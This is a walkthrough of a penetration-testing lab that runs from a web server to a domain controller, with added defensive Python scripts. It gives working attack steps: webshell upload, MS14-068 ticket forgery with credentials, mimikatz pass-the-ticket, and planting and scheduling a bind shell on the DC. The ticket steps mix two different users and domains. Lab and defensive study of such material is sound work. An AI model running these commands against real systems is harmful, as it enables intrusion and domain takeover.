Complete internal-network domain lab: webhack123
forg12

Lab description

Lab topology


PS: the lab was created by 暗月.

HOSTS setup

cat /etc/hosts  
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

192.168.0.203 www.webhack123.com


Web server

Information gathering

Port scan

sudo nmap -sT -sV -O -p- 192.168.0.203
Starting Nmap 7.93 ( https://nmap.org )
Stats: 0:01:17 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Nmap scan report for www.webhack123.com (192.168.0.203)
Host is up (0.0032s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:44:38:FD (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.37 seconds
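From a defender's point of view, the interesting part of this scan is not the web port but everything else the web server exposes on the same interface: SMB, NetBIOS, RPC, the MySQL listener and RDP. The following Python script is an added example, not part of the original post or the lab; it parses normal nmap port-table output (a subset of the scan above is embedded as sample input) and reports which open ports violate a hypothetical exposure policy for a web server. The `RESTRICTED_PORTS` policy table is this example's own assumption.

```python
"""Exposure review of an nmap port table (added example, not from the original post)."""
import re
from typing import Dict, List, Tuple

# Sample taken from the scan output above (a subset, embedded so the script runs offline).
NMAP_SAMPLE = """\
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ssl/ms-wbt-server?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc Microsoft Windows RPC
"""

# Assumed exposure policy (hypothetical): ports a web server should not expose to untrusted networks.
RESTRICTED_PORTS = {
    445: "SMB reachable: lateral movement and credential relay surface",
    139: "NetBIOS session service reachable",
    135: "MS-RPC endpoint mapper reachable",
    3306: "database listener reachable; bind to localhost or filter",
    3389: "RDP reachable; restrict to the management network",
}

# One nmap port line: "<port>/<proto> <state> <service> [<version...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_port_table(text: str) -> List[Tuple[int, str, str, str]]:
    """Return (port, state, service, version) for each port line in normal nmap output."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(3), m.group(4), m.group(5) or ""))
    return rows


def review_exposure(text: str) -> Dict[int, str]:
    """Map each open restricted port to the reason it should be filtered."""
    return {port: RESTRICTED_PORTS[port]
            for port, state, _svc, _ver in parse_port_table(text)
            if state == "open" and port in RESTRICTED_PORTS}


def high_ports_rpc(text: str) -> List[int]:
    """Open MS-RPC listeners in the dynamic range (49152+) show the RPC range is unfiltered."""
    return [port for port, state, svc, _ in parse_port_table(text)
            if state == "open" and svc == "msrpc" and port >= 49152]


if __name__ == "__main__":
    for port, why in sorted(review_exposure(NMAP_SAMPLE).items()):
        print(f"{port}: {why}")
    print("dynamic RPC ports open:", high_ports_rpc(NMAP_SAMPLE))
```

Run it against the saved output of `nmap -oN`; anything it prints is a host-firewall or segmentation rule to add before the web application is even looked at.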

Directory scanning

dirsearch -u "www.webhack123.com"                    

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/www.webhack123.com.txt

Error Log: /home/kali/.dirsearch/logs/errors.log

Target: http://www.webhack123.com/

[02:43:50] Starting:
[02:43:51] 403 - 2KB - /%C0%AE%C0%AE%C0%AF
[02:43:51] 403 - 2KB - /%3f/
[02:43:51] 403 - 2KB - /%ff
[02:43:52] 200 - 6KB - /.DS_Store
[02:43:52] 200 - 6KB - /.ds_store
[02:43:53] 403 - 2KB - /.ht_wsr.txt
[02:43:53] 403 - 2KB - /.htaccess.bak1
[02:43:53] 403 - 2KB - /.htm
[02:43:53] 403 - 2KB - /.html
[02:43:53] 403 - 2KB - /.htaccessOLD2
[02:43:53] 403 - 2KB - /.htaccessBAK
[02:43:53] 403 - 2KB - /.htaccess.orig
[02:43:53] 403 - 2KB - /.htaccess_extra
[02:43:53] 403 - 2KB - /.htaccess.sample
[02:43:53] 403 - 2KB - /.htaccess_orig
[02:43:54] 403 - 2KB - /.htaccess_sc
[02:43:54] 301 - 240B - /.idea -> http://www.webhack123.com/.idea/
[02:43:54] 403 - 2KB - /.htaccessOLD
[02:43:54] 403 - 2KB - /.htpasswd_test
[02:43:54] 403 - 2KB - /.htaccess.save
[02:43:54] 403 - 2KB - /.htpasswds
[02:43:54] 403 - 2KB - /.httr-oauth
[02:43:54] 403 - 2KB - /.idea/
[02:43:54] 301 - 253B - /.idea/dictionaries -> http://www.webhack123.com/.idea/dictionaries/
[02:43:54] 200 - 264B - /.idea/modules.xml
[02:43:54] 200 - 333B - /.idea/misc.xml
[02:43:54] 200 - 180B - /.idea/vcs.xml
[02:43:54] 200 - 38KB - /.idea/workspace.xml
[02:43:56] 301 - 239B - /.svn -> http://www.webhack123.com/.svn/
[02:43:56] 200 - 3B - /.svn/entries
[02:43:56] 403 - 2KB - /.svn/
[02:43:57] 200 - 428KB - /.svn/wc.db
[02:43:59] 200 - 479B - /404.html
[02:44:02] 403 - 2KB - /Public/
[02:44:03] 403 - 2KB - /Trace.axd::$DATA
[02:44:16] 403 - 2KB - /app/.htaccess
[02:44:16] 301 - 238B - /app -> http://www.webhack123.com/app/
[02:44:16] 403 - 2KB - /app/
[02:44:18] 301 - 239B - /base -> http://www.webhack123.com/base/
[02:44:18] 403 - 2KB - /base/
[02:44:20] 403 - 2KB - /cgi-bin/
[02:44:21] 500 - 3KB - /cgi-bin/printenv.pl
[02:44:27] 301 - 240B - /error -> http://www.webhack123.com/error/
[02:44:27] 200 - 2KB - /error/
[02:44:33] 200 - 11KB - /index.php
[02:44:33] 403 - 2KB - /index.php::$DATA
[02:44:33] 200 - 11KB - /index.pHp
[02:44:34] 200 - 11KB - /index.php.
[02:44:34] 200 - 15KB - /index.php/login/
[02:44:47] 301 - 241B - /public -> http://www.webhack123.com/public/
[02:44:47] 301 - 243B - /public.. -> http://www.webhack123.com/public../
[02:44:47] 403 - 2KB - /public/
[02:44:54] 403 - 2KB - /server-info
[02:44:54] 403 - 2KB - /server-status/
[02:44:54] 403 - 2KB - /server-status
[02:45:00] 403 - 2KB - /web.config::$DATA

Task Completed
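The scan above shows the classic pattern of a site deployed straight from a developer's working directory: `.DS_Store`, the `.idea/` project files and the `.svn/` working copy (with `wc.db`) are all served with HTTP 200, while only the `.htaccess` variants are blocked. The Python script below is an added example, not from the original post; it parses dirsearch-style result lines (a constructed sample modelled on the output above) and reports every path that is both served successfully and matches a pattern for leaked VCS, IDE or OS metadata. The pattern list is this example's own and is not exhaustive.

```python
"""Flag exposed VCS/IDE/OS metadata in dirsearch-style output (added example, not from the original post)."""
import re
from typing import List, Tuple

# Constructed sample modelled on the dirsearch output above.
DIRSEARCH_SAMPLE = """\
[02:43:52] 200 - 6KB - /.DS_Store
[02:43:53] 403 - 2KB - /.htaccess.bak1
[02:43:54] 301 - 240B - /.idea -> http://www.webhack123.com/.idea/
[02:43:54] 200 - 38KB - /.idea/workspace.xml
[02:43:56] 200 - 3B - /.svn/entries
[02:43:56] 403 - 2KB - /.svn/
[02:43:57] 200 - 428KB - /.svn/wc.db
[02:43:59] 200 - 479B - /404.html
[02:44:33] 200 - 11KB - /index.php
[02:44:54] 403 - 2KB - /server-status
"""

# Paths that leak source, structure or credentials when served with HTTP 200.
# This list is the example's own assumption, not a complete catalogue.
SENSITIVE = [
    (re.compile(r"^/\.svn/"), "Subversion working copy (wc.db/entries expose the file list and content)"),
    (re.compile(r"^/\.git/"), "Git repository metadata"),
    (re.compile(r"^/\.idea/"), "JetBrains project files (workspace.xml lists paths, DB connections, recent edits)"),
    (re.compile(r"/\.DS_Store$", re.IGNORECASE), "macOS Finder index listing directory contents"),
    (re.compile(r"\.(bak|old|orig|swp)$", re.IGNORECASE), "backup or editor copy of a file"),
]

# "[hh:mm:ss] <status> - <size> - <path> [-> redirect]"
RESULT_LINE = re.compile(r"^\[\d\d:\d\d:\d\d\]\s+(\d{3})\s+-\s+\S+\s+-\s+(\S+)")


def parse_results(text: str) -> List[Tuple[int, str]]:
    """Return (status, path) for each result line; the '-> redirect' tail is ignored."""
    out = []
    for line in text.splitlines():
        m = RESULT_LINE.match(line)
        if m:
            out.append((int(m.group(1)), m.group(2)))
    return out


def exposed_artifacts(text: str) -> List[Tuple[str, str]]:
    """Paths served with 200 that match a sensitive pattern, paired with the reason."""
    findings = []
    for status, path in parse_results(text):
        if status != 200:
            continue  # 403/301 mean the server blocked or bounced the request
        for pat, why in SENSITIVE:
            if pat.search(path):
                findings.append((path, why))
                break
    return findings


if __name__ == "__main__":
    for path, why in exposed_artifacts(DIRSEARCH_SAMPLE):
        print(f"EXPOSED {path}: {why}")
```

The fix on the server side is twofold: deny every dot-directory and dot-file at the web server (Apache's `<DirectoryMatch "/\.">` with `Require all denied`), and deploy exported builds rather than working copies so the metadata is never on the host in the first place.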

.DS_Store leak

python3 ds_store_exp.py http://www.webhack123.com/.DS_Store 


SVN leak

python3 SvnExploit.py -u http://www.webhack123.com/.svn/ 


Vulnerability testing

Sensitive information leak in log files

Opening the log files reveals records of SQL modification statements.


Write a small script to dump all of the log files into a single file: script download link

With the logs collected, filter out the SQL records that update passwords:

cat logs.txt | grep "UPDATE"  | grep "pass"


Because the log is in chronological order, the entry at the bottom is the most recent password change.

74c774ef39b5b977c1fd59dbfc73c3e380a65aa3
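The root cause here is that the application logged full SQL statements, so every password hash ever written ended up in a world-readable file. The Python script below is an added example, not from the original post or the lab; it scans constructed log lines in the same style (the hash values are made up), flags each statement that writes a password-like column, and returns a scrubbed copy of the log with those literals replaced. The column names in `PASSWORD_COLS` and the `hb_user` table are this example's assumptions.

```python
"""Detect and redact password material in SQL statements found in application logs (added example)."""
import re
from typing import List, Tuple

# Constructed log lines in the style of the leaked query log; hash values are made up.
LOG_SAMPLE = """\
2024-01-11 10:01:02 Query  SELECT id,name FROM hb_user WHERE id=1
2024-01-11 10:02:15 Query  UPDATE hb_user SET password='0000000000000000000000000000000000000000',update_time=1704967335 WHERE id=1
2024-01-11 10:03:40 Query  INSERT INTO hb_user (name,pass) VALUES ('bob','ffffffffffffffffffffffffffffffffffffffff')
2024-01-11 10:04:01 Query  UPDATE hb_article SET title='hello' WHERE id=7
"""

# Columns whose values must never reach a log. The names are this example's assumption.
PASSWORD_COLS = r"(?:password|passwd|pass|pwd)"
# "SET password='...'" style assignments; group 1 keeps the column and '=' so only the literal is replaced.
SET_ASSIGN = re.compile(rf"(\b{PASSWORD_COLS}\s*=\s*)'[^']*'", re.IGNORECASE)
# "INSERT INTO t (cols) VALUES (vals)"; group 1 = column list, group 2 = value list.
INSERT_FORM = re.compile(rf"\binsert\s+into\b.*\(([^)]*)\)\s*values\s*\(([^)]*)\)", re.IGNORECASE | re.DOTALL)


def touches_password(stmt: str) -> bool:
    """True when a statement writes a password-like column."""
    if SET_ASSIGN.search(stmt):
        return True
    m = INSERT_FORM.search(stmt)
    return bool(m and re.search(rf"\b{PASSWORD_COLS}\b", m.group(1), re.IGNORECASE))


def redact(stmt: str) -> str:
    """Replace password literals with [REDACTED]; other columns are left intact.

    The INSERT handling splits the value list on commas, which is enough for
    simple literals like the sample; a production scrubber would use an SQL tokenizer.
    """
    stmt = SET_ASSIGN.sub(r"\1'[REDACTED]'", stmt)
    m = INSERT_FORM.search(stmt)
    if m:
        cols = [c.strip().strip("`") for c in m.group(1).split(",")]
        vals = [v.strip() for v in m.group(2).split(",")]
        if len(cols) == len(vals):
            for i, col in enumerate(cols):
                if re.fullmatch(PASSWORD_COLS, col, re.IGNORECASE):
                    vals[i] = "'[REDACTED]'"
            stmt = stmt[:m.start(2)] + ",".join(vals) + stmt[m.end(2):]
    return stmt


def scan_log(text: str) -> Tuple[List[str], List[str]]:
    """Return (findings, scrubbed_lines): which lines leaked a secret, and a copy safe to retain."""
    findings, scrubbed = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if touches_password(line):
            findings.append(f"line {n}: password column written in logged SQL")
            line = redact(line)
        scrubbed.append(line)
    return findings, scrubbed


if __name__ == "__main__":
    found, clean = scan_log(LOG_SAMPLE)
    print("\n".join(found))
    print("\n".join(clean))
```

Redaction after the fact only limits the damage; the real fix is to stop logging statement bodies for write queries (or to log parameterized queries without their bound values) and to keep query logs off the document root.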


Host collision

Since directory scanning did not turn up the admin backend, try Host-header collision to discover subdomains served by the same IP.

Write a simple Host collision script: script download link

go run main.go


Backend file upload to get a shell

Log into the backend with the password obtained earlier and add php to the list of allowed upload file types.


Upload the webshell through the site logo field lower down on the page. The response contains a relative path; combined with the directory scan results, the file lands under public/upload.


Flag1


Flag2


Domain controller

Information gathering

Bring the host online in CS and inject into a process owned by a domain user.


Find the domain controller's address:

shell net time /domain
shell ping dc.hackbox.com


Dumping password credentials


MS14-068

shell whoami /user
shell ms14-068.exe -u web@hackbox.com -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.10.10.149 -p !@#Qwe456
mimikatz kerberos::ptc TGT_web@hackbox.com.ccache

shell dir \\dc.hackbox.com\c$
shell copy bind4444.exe \\dc.hackbox.com\C$
shell net time \\dc.hackbox.com
shell at \\dc.hackbox.com 15:39 "c:/bind4444.exe"

Get the domain user's SID

shell whoami /user


Use the exploit to export a ticket

shell ms14-068.exe -u test@sty.com -s S-1-5-21-4087924319-805361504-2015691904-1104 -d 10.1.1.10 -p Admin12345


Import the ticket with mimikatz

mimikatz kerberos::ptc TGT_web@hackbox.com.ccache


Verify that the IPC connection succeeds

shell dir \\dc.hackbox.com\c$


Bring the DC online via at

shell net time \\dc.hackbox.com
shell at \\dc.hackbox.com 15:39 "c:/bind4444.exe"


connect 10.10.10.149 4444


Flag3
